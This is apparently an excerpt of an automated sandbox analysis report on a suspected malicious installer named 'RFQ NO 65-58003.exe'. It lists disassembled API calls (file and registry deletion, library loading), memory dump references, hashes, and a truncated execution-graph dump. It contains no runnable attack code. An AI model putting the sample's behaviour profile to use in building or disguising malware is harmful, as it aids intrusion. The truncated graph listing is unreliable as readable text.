                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                              • API String ID: 1451636040-1158693248
                                                              • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                              • Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
                                                              • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                              • Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
                                                              • GlobalFree.KERNEL32(?), ref: 0040296C
                                                              • GlobalFree.KERNEL32(00000000), ref: 0040297F
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                              • Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
                                                              • Opcode Fuzzy Hash: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                              • Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98
                                                              APIs
                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                              • wsprintfW.USER32 ref: 00404BD7
                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s$(7B
                                                              • API String ID: 3540041739-1320723960
                                                              • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                              • Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
                                                              • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                              • Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402CB4
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402CF9
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D1E
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Close$DeleteEnumOpen
                                                              • String ID:
                                                              • API String ID: 1912718029-0
                                                              • Opcode ID: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                              • Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
                                                              • Opcode Fuzzy Hash: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                              • Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                              • Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
                                                              • Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                              • Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(?,?,0040B5D8,000000FF,loyolism,00000400,?,?,00000021), ref: 004025FE
                                                              • lstrlenA.KERNEL32(loyolism,?,?,0040B5D8,000000FF,loyolism,00000400,?,?,00000021), ref: 00402609
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidelstrlen
                                                              • String ID: loyolism
                                                              • API String ID: 3109718747-2838521280
                                                              • Opcode ID: 91cc700c78dfe4b07254198256f44d4729cb2cbe27dddbc7cc6f12c5bdf8e3c1
                                                              • Instruction ID: 0226f840347654c2ecdc96a32175c32971a63fe26a5c545fd31e5d705646dbf5
                                                              • Opcode Fuzzy Hash: 91cc700c78dfe4b07254198256f44d4729cb2cbe27dddbc7cc6f12c5bdf8e3c1
                                                              • Instruction Fuzzy Hash: CE11C872A05714BADB106BB18E8999E7765AF00359F20453FF102F61C1DAFC8982575E
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BD6
                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405BE8
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-3936084776
                                                              • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                              • Instruction ID: 65d0506ad812cb1a76e9921ecf3bea8c464967d5314b17a54056b3388df28152
                                                              • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                              • Instruction Fuzzy Hash: 41D05E31101535AAC2117B44AC04CDB66AC9E46304342487EF541B60A9C77C696296EE
                                                              APIs
                                                              • SetWindowTextW.USER32(00000000,00429240), ref: 00403DC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: TextWindow
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$1033
                                                              • API String ID: 530164218-2544948282
                                                              • Opcode ID: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                              • Instruction ID: 03976cd0908ed948c9bf00cc325fcd7bd37552fd0e89046400bf063f4d175d83
                                                              • Opcode Fuzzy Hash: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                              • Instruction Fuzzy Hash: 5D11D131B44210DBC734AF15DC80A377BADEF85715B2841BFE8016B3A1DB3A9D0386A9
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 00405314
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405365
                                                                • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                              • Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
                                                              • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                              • Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D
                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ NO 65-58003.exe,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405C18
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ NO 65-58003.exe,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405C28
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-3125694417
                                                              • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                              • Instruction ID: 7c763ee06e751a121eeaaae5fe0630bfdebb5bec0d299de236eb7caac3423831
                                                              • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                              • Instruction Fuzzy Hash: BCD05EB2404A249ED322A704ED0499F67A8EF12300786886AE440A6165D7789C8186AD
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D74
                                                              • CharNextA.USER32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D85
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                              • Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
                                                              • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                              • Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99

                                                              Execution Graph

                                                              Execution Coverage:2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:1.3%
                                                              Total number of Nodes:1649
                                                              Total number of Limit Nodes:1
                                                              execution_graph: rendered call graph (node ids, function addresses, API names and call edges) from the interactive report; the serialized node and edge listing is omitted here, and it is truncated in the source.
6263->6325 6265->6227 6267 2120393f 6266->6267 6269 21203968 6267->6269 6270 212034f9 6267->6270 6284 21203be0 6267->6284 6271 21203972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6269->6271 6270->6250 6272 212038e8 6270->6272 6271->6270 6302 21203af1 6272->6302 6275 212038fd 6275->6252 6278 21203918 6278->6252 6281 2120399c 6280->6281 6282 2120397d 6280->6282 6281->6250 6283 21203987 RtlDeleteCriticalSection 6282->6283 6283->6281 6283->6283 6289 21203a82 6284->6289 6286 21203bfa 6287 21203c18 InitializeCriticalSectionAndSpinCount 6286->6287 6288 21203c03 6286->6288 6287->6288 6288->6267 6290 21203aaa 6289->6290 6293 21203aa6 __crt_fast_encode_pointer 6289->6293 6290->6293 6295 212039be 6290->6295 6293->6286 6294 21203ac4 GetProcAddress 6294->6293 6297 212039cd try_get_first_available_module 6295->6297 6296 212039ea LoadLibraryExW 6296->6297 6298 21203a05 GetLastError 6296->6298 6297->6296 6299 21203a60 FreeLibrary 6297->6299 6300 21203a77 6297->6300 6301 21203a38 LoadLibraryExW 6297->6301 6298->6297 6299->6297 6300->6293 6300->6294 6301->6297 6303 21203a82 try_get_function 5 API calls 6302->6303 6304 21203b0b 6303->6304 6305 21203b24 TlsAlloc 6304->6305 6306 212038f2 6304->6306 6306->6275 6307 21203ba2 6306->6307 6308 21203a82 try_get_function 5 API calls 6307->6308 6309 21203bbc 6308->6309 6310 21203bd7 TlsSetValue 6309->6310 6311 2120390b 6309->6311 6310->6311 6311->6278 6312 2120391b 6311->6312 6313 2120392b 6312->6313 6314 21203925 6312->6314 6313->6275 6316 21203b2c 6314->6316 6317 21203a82 try_get_function 5 API calls 6316->6317 6318 21203b46 6317->6318 6319 21203b5e TlsFree 6318->6319 6320 21203b52 6318->6320 6319->6320 6320->6313 6324 21207470 6321->6324 6322 21202ada _ValidateLocalCookies 5 API calls 6323 212024a3 6322->6323 6323->6224 6323->6258 6324->6322 6326 21203c59 6325->6326 6328 21203c7f 6325->6328 6327 21203c69 FreeLibrary 6326->6327 6326->6328 6327->6326 6328->6265 6330 212024c4 6329->6330 6331 212024c8 6329->6331 6330->6230 6332 
